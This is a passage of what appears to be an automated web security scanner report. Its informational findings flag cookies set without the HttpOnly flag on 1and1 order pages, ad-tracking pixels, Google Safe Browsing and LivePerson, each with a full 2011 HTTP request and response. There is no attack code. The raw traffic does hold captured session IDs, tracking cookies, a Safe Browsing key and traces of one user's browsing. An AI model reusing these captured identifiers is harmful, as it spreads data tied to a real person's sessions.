15.163. http://order.1and1.com/xml/order/LocalSubmission  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/LocalSubmission

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/LocalSubmission HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:23:19 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=29533dba249b8800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/LocalSubmission;jsessionid=01CF8E6023011C6426E678B6D93D8AAA.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.164. http://order.1and1.com/xml/order/Mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:17:42 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=6b420e813c725400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Mail;jsessionid=CA9E16FDE0C804118E44DA12F452F858.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.165. http://order.1and1.com/xml/order/MailInstantMail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MailInstantMail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:17:43 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=58856c260a25e000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailInstantMail;jsessionid=A5B0659099D608729C1BCFFF0B12AFDF.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.166. http://order.1and1.com/xml/order/MailXchange  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MailXchange HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:17:45 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=612cd31d69a45c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailXchange;jsessionid=BDCA6848BD3804BA7C1F67C9477F583C.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.167. http://order.1and1.com/xml/order/MicrosoftExchange  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MicrosoftExchange

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MicrosoftExchange HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:17:46 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=676e6c38003c4800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MicrosoftExchange;jsessionid=0786221DBA06ABA99D012F91B89135A9.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.168. http://order.1and1.com/xml/order/MsHosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MsHosting HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:17:48 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=66286b50374fcc00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MsHosting;jsessionid=0F99D7D92A38DDBCF39F2F7B61FE89E8.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.169. http://order.1and1.com/xml/order/Server  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:18:51 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=5a732e12f7f2b800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Server;jsessionid=1B9197355FB6424972E33E943523E11D.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.170. http://order.1and1.com/xml/order/ServerPremium  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/ServerPremium

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/ServerPremium HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:20:28 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=68fae90dec99800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/ServerPremium;jsessionid=766354BD94AF964A6388F621CEC4DEC5.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.171. http://order.1and1.com/xml/order/VirtualServer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/VirtualServer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:23:16 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3b6dad9b0ededc00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServer;jsessionid=F7104B2DE81895937031D9F91918D6E3.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.172. http://order.1and1.com/xml/order/sitedesign  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/sitedesign

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/sitedesign HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:26:39 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=563b140fb3ae4800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/sitedesign;jsessionid=19402CA3AB6E33A4EAEA02D11F6E8EF2.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.173. http://pixel.mathtag.com/creative/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /creative/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creative/img?mt_adid=70&mt_aid=54393751066380379&mt_exid=4&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=5:1300987769|1:1300977498|10001:1297818481|10004:1299934992|11:1299460723|2:1299285586|3:1299090747|4:1299460679|9:1300624484; ts=1301103428; uuid=4d5b2371-3928-7a83-24fb-d52328f5624b

Response

HTTP/1.1 200 OK
Server: mt2/1.2.3.967 Oct 13 2010-13:40:24 ewr-pixel-x4 pid 0x5572 21874
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 26 Mar 2011 01:37:34 GMT
Etag: 4d5b2371-3928-7a83-24fb-d52328f5624b
Connection: Keep-Alive
Set-Cookie: ts=1301103454; domain=.mathtag.com; path=/; expires=Sun, 25-Mar-2012 01:37:34 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: ts=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: ts=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: trx=008; domain=.mathtag.com; path=/; expires=Sat, 19-Nov-2010 18:21:31 GMT
Set-Cookie: uuid=4d5b2371-3928-7a83-24fb-d52328f5624b; domain=.mathtag.com; path=/; expires=Sun, 25-Mar-2012 01:37:34 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
15.174. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1200291089;fpan=0;fpa=P0-1364029523-1300987777508;ns=0;url=http%3A%2F%2Fwww.huffingtonpost.com%2F2011%2F03%2F26%2Fgeraldine-ferraro-dead-dies_n_840995.html;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=type.article%2Csite_name.The%20Huffington%20Post%2Ctitle.Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075;dst=1;et=1301171825238;tzo=300;a=p-6fTutip1SMLM2;labels=Politics HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EFEAEc45slG6iR6aEAG5AQGuBoFw9ZrRxs_BU5Tl4eooIAmxoa-B1QxQINUOUA-1tNECDsKi3hkjECEJEABBAswuNGltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=946552&t=2
Set-Cookie: d=EAYAEc45slG6iR6aEAG5AQGuBoFw9ZrRxs_BU5Tl4eooIAmxocdN95YMUCDVDlAPtbTRAg7Cot4ZIxAhCRAAQQKdLEltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA; expires=Fri, 24-Jun-2011 20:36:18 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: QS

15.175. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-3aud4J6uA4Z6Y.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-3aud4J6uA4Z6Y.gif?labels=InvisibleBox&busty=5314 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EAYAEc45slG6iR6aEAG5AQGuBoFw9ZrRxs_BU5Tl4eooIAmxocdN95YMUCDVDlAPtbTRAg7Cot4ZIxAhCRAAQQKdLEltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA

Response

HTTP/1.1 302 Found
Connection: close
Location: https://www.googleadservices.com/pagead/conversion/1028406127/?label=DP44CM-K9gEQ7_aw6gM&amp;guid=ON&amp;script=0
Set-Cookie: d=EMsAEc45slG6iR6aEAG7AQGuBoFw9ZrRxs_BU5Tl4eooIOGbE8dN95YMUCDVDlAPtbTRAg7Cot4ZIxAhCRAAQQKdLEltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tXCDRA; expires=Fri, 24-Jun-2011 20:36:22 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 26 Mar 2011 20:36:22 GMT
Server: QS

15.176. http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-5aWVS_roA1dVM.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-5aWVS_roA1dVM.gif?labels=19677.16 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EBgAEc45slG6iR6aEAG3AQGuBoFw9ZrRxs_BU5Tl4eooIAmxoa-B1QxQINUOUA-1tNECDsKi3hkjECEJEABBAp0sSW1KKh8nQTJcJNJQMssoQBhbEvSyhVDKF5ehLTANqSDS45sdL5Hi1WAA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/pixel?pixelID=18407&partnerID=41&clientID=1545&key=segment&pb=0
Set-Cookie: d=EHYAEc45slG6iR6aEAG5AQGuBoFw9ZrRxs_BU5Tl4eooIOGbE8dN95YMUCDVDlAPtbTRAg7Cot4ZIxAhCRAAQQKdLEltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA; expires=Fri, 24-Jun-2011 20:36:19 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 26 Mar 2011 20:36:19 GMT
Server: QS

15.177. http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /seg/p-6fTutip1SMLM2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/p-6fTutip1SMLM2.js HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EBMAEc45slG6iR6aEAG5AQGsBoEw9ZrRxs_BU5Tl4eooIAmxoa-B1QxQINUOUA-1tNECDsKi3hkjECEJEABBAswuNGltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA
If-None-Match: "S19506:E0-184653678-1300987722635"

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EFEAEc45slG6iR6aEAG5AQGuBoFw9ZrRxs_BU5Tl4eooIAmxoa-B1QxQINUOUA-1tNECDsKi3hkjECEJEABBAswuNGltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA; expires=Fri, 24-Jun-2011 20:36:03 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
ETag: "S19556:E0-184653678-1300987722635"
Cache-Control: private, no-transform, max-age=600
Expires: Sat, 26 Mar 2011 20:46:03 GMT
Content-Length: 538
Date: Sat, 26 Mar 2011 20:36:03 GMT
Server: QS

function _qcdomain2(){
var d=document.domain;
if(d.substring(0,4)=="www.")d=d.substring(4,d.length);
var a=d.split(".");var len=a.length;
if(len<3)return d;
var e=a[len-1];
if(e.length<3)return
...[SNIP]...
15.178. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=10.0.648.151&pver=2.2&wrkey=AKEgNiu2mFE63FMw496NljDbfuqWVUHfR5aspR9G78SPoDGBnjDblFO5_v3By_lHgdefi2qYWL0qQkqRPEgqQcEZbPgzqr3RaA== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Length: 104
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=hECaSPNKbGmHQVaeX8QfVjYPb7irgBJrevtV-Ucf8CbbaGBgB7E0-GXnJT1n8t0Kfgh9itDw1n5QPZyWBCgiZYImFLvylkVRtN68wV37kiG2NOQgw1cJtXY_RuWuwwF_; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301077647:GM=1:IG=3:SG=1:S=9UvUxDIbgGP9-w2y

goog-malware-shavar;a:27774-34663:s:40463-47213:mac
goog-phish-shavar;a:130083-134182:s:66939-68568:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301081993:GM=1:IG=3:SG=1:S=P4ZuZeeHinwF7KvI; expires=Sun, 24-Mar-2013 19:39:53 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:39:53 GMT
Server: Chunked Update Server
Content-Length: 887
X-XSS-Protection: 1; mode=block
Expires: Fri, 25 Mar 2011 19:39:53 GMT
Cache-Control: private

m:Ejn9-Y_3c7-WAcrCJu03BXXpV-Y=
n:1828
i:goog-malware-shavar
u:safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY6_ACIPTwAioFcrgAAAcyBWu4AAB_,89mcjPvVLz1ZpWa7L6xaKzwV65E=
u:
...[SNIP]...
15.179. http://safebrowsing.clients.google.com/safebrowsing/gethash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/gethash

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/gethash?client=googlechrome&appver=10.0.648.151&pver=2.2&wrkey=AKEgNiu2mFE63FMw496NljDbfuqWVUHfR5aspR9G78SPoDGBnjDblFO5_v3By_lHgdefi2qYWL0qQkqRPEgqQcEZbPgzqr3RaA== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Length: 8
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=hECaSPNKbGmHQVaeX8QfVjYPb7irgBJrevtV-Ucf8CbbaGBgB7E0-GXnJT1n8t0Kfgh9itDw1n5QPZyWBCgiZYImFLvylkVRtN68wV37kiG2NOQgw1cJtXY_RuWuwwF_; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301139890:GM=1:IG=3:SG=1:S=O0gQ5y7hhNKL77Jw

4:4
...

Response

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301140305:GM=1:IG=3:SG=1:S=HueoMC6XtnV6npfN; expires=Mon, 25-Mar-2013 11:51:45 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 11:51:45 GMT
Server: Hash Suffix Server
Content-Length: 90
X-XSS-Protection: 1; mode=block
Expires: Sat, 26 Mar 2011 11:51:45 GMT
Cache-Control: private

ibCeOfOv4k41gkiZGXS-JFghqA0=
goog-malware-shavar:32199:32
... .&...I..7 8xT.ESz.z....vD..
15.180. http://sales.liveperson.net/hc/18987408/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/18987408/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/18987408/?&visitor=44502044936234&msessionkey=8111676996462627651&site=18987408&cmd=mTagInPage&lpCallId=665304316906-758526689838&protV=20&lpjson=1&page=http%3A//advertising.microsoft.com/search-advertising%3Fs_cid%3Dus_bing_footer&id=877323544&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-adcenter-us-english&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://advertising.microsoft.com/search-advertising?s_cid=us_bing_footer
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8111676996462627651; HumanClickSiteContainerID_18987408=STANDALONE; LivePersonID=LP i=44502044936234,d=1297806164

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 00:57:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_18987408=STANDALONE; path=/hc/18987408
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 26 Mar 2011 00:57:44 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
